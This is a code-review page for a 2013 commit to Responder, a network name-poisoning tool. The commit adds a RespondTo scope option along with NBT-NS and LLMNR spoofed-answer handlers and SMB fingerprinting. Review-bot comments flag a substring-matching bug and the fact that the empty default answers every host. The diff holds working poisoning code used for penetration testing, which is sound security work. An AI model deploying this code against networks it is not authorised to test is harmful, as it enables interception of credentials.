Added: in-scope only target. See Responder.conf.

lgandx 2013-11-09 13:54:19 -05:00
parent 9b608aad30
commit 0465bd604d
2 changed files with 93 additions and 34 deletions


@ -19,6 +19,10 @@ Bind_to = 0.0.0.0
;Set this to change the default logging file ;Set this to change the default logging file
SessionLog = Responder-Session.log SessionLog = Responder-Session.log
; ;
;Set this options with your in-scope targets. Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
;RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
RespondTo =
;
[HTTP Server] [HTTP Server]
;; ;;
;Set this to On if you want to always serve a specific file to the victim. ;Set this to On if you want to always serve a specific file to the victim.
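Review bot: The new `RespondTo` comment does not say what an empty value means, and the shipped default is empty. As the handler hunks in this commit read, an empty value makes `RespondToSpecificHost` return False and the code falls through to the unrestricted branch, so the default answers every host on the segment. I would state that in the file, e.g. `;Leave RespondTo empty to answer every host (no scope restriction).`, so an operator working under a defined scope knows the restriction is opt-in.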


@ -63,6 +63,8 @@ Exe_On_Off = config.get('HTTP Server', 'Serve-Exe').upper()
Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper() Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper()
FILENAME = config.get('HTTP Server', 'Filename') FILENAME = config.get('HTTP Server', 'Filename')
WPAD_Script = config.get('HTTP Server', 'WPADScript') WPAD_Script = config.get('HTTP Server', 'WPADScript')
RespondTo = config.get('Responder Core', 'RespondTo').strip()
RespondTo.split(",")
#Cli options. #Cli options.
OURIP = options.OURIP OURIP = options.OURIP
LM_On_Off = options.LM_On_Off.upper() LM_On_Off = options.LM_On_Off.upper()
@ -141,6 +143,18 @@ def Is_Finger_On(Finger_On_Off):
if Finger_On_Off == "OFF": if Finger_On_Off == "OFF":
return False return False
def RespondToSpecificHost(RespondTo):
if len(RespondTo)>=1 and RespondTo != ['']:
return True
else:
return False
def RespondToIPScope(RespondTo, ClientIp):
if ClientIp in RespondTo:
return True
else:
return False
################################################################################## ##################################################################################
#NBT NS Stuff #NBT NS Stuff
################################################################################## ##################################################################################
@ -188,6 +202,28 @@ class NB(SocketServer.BaseRequestHandler):
def handle(self): def handle(self):
request, socket = self.request request, socket = self.request
data = request data = request
if RespondToSpecificHost(RespondTo):
if RespondToIPScope(RespondTo, self.client_address[0]):
if data[2:4] == "\x01\x10":
if Validate_NBT_NS(data,Wredirect):
buff = NBT_Ans()
buff.calculate(data)
for x in range(1):
socket.sendto(str(buff), self.client_address)
print "NBT-NS Answer sent to: ", self.client_address[0]
logging.warning('NBT-NS Answer sent to: %s'%(self.client_address[0]))
if Is_Finger_On(Finger_On_Off):
try:
Finger = RunSmbFinger((self.client_address[0],445))
logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception:
logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass
else:
pass
else:
if data[2:4] == "\x01\x10": if data[2:4] == "\x01\x10":
if Validate_NBT_NS(data,Wredirect): if Validate_NBT_NS(data,Wredirect):
buff = NBT_Ans() buff = NBT_Ans()
@ -705,7 +741,7 @@ def Parse_IPV6_Addr(data):
return True return True
def RunLLMNR(): def RunLLMNR():
ALL = "0.0.0.0" ALL = BIND_TO_IP
MADDR = "224.0.0.252" MADDR = "224.0.0.252"
MPORT = 5355 MPORT = 5355
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
@ -717,9 +753,28 @@ def RunLLMNR():
while True: while True:
try: try:
data, addr = sock.recvfrom(1024) data, addr = sock.recvfrom(1024)
if RespondToSpecificHost(RespondTo):
if RespondToIPScope(RespondTo, addr[0]):
if data[2:4] == "\x00\x00":
if Parse_IPV6_Addr(data):
Name = Parse_LLMNR_Name(data,addr)
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
buff.calculate()
for x in range(1):
sock.sendto(str(buff), addr)
if Is_Finger_On(Finger_On_Off):
try:
Finger = RunSmbFinger((addr[0],445))
logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception:
logging.warning('[+] Fingerprint failed for host: %s'%(addr[0]))
pass
else:
pass
else:
if data[2:4] == "\x00\x00": if data[2:4] == "\x00\x00":
if Parse_IPV6_Addr(data): if Parse_IPV6_Addr(data):
global Name
Name = Parse_LLMNR_Name(data,addr) Name = Parse_LLMNR_Name(data,addr)
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name) buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
buff.calculate() buff.calculate()
@ -805,7 +860,7 @@ class DNSTCP(SocketServer.BaseRequestHandler):
self.request.send(buff) self.request.send(buff)
except Exception: except Exception:
raise pass
################################################################################## ##################################################################################
#HTTP Stuff #HTTP Stuff
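Review bot: The scope list is never built, because `RespondTo.split(",")` in the config-loading hunk discards its result, so `RespondTo` stays a string and `ClientIp in RespondTo` in `RespondToIPScope` becomes a substring test. With the example value from Responder.conf, a client at 10.20.1.11 matches inside `10.20.1.116` and is answered although it is not listed, which defeats the in-scope restriction. Assigning the parsed list fixes both helpers: `RespondTo = [ip.strip() for ip in config.get('Responder Core', 'RespondTo').split(',') if ip.strip()]`, after which `RespondToSpecificHost` can be `return bool(RespondTo)`. Separately, the DNSTCP hunk turns `raise` into `pass`, which hides every handler error; logging the exception there would keep failures visible. Indentation is lost on this page, so this reading assumes nothing outside the visible hunks reassigns `RespondTo`.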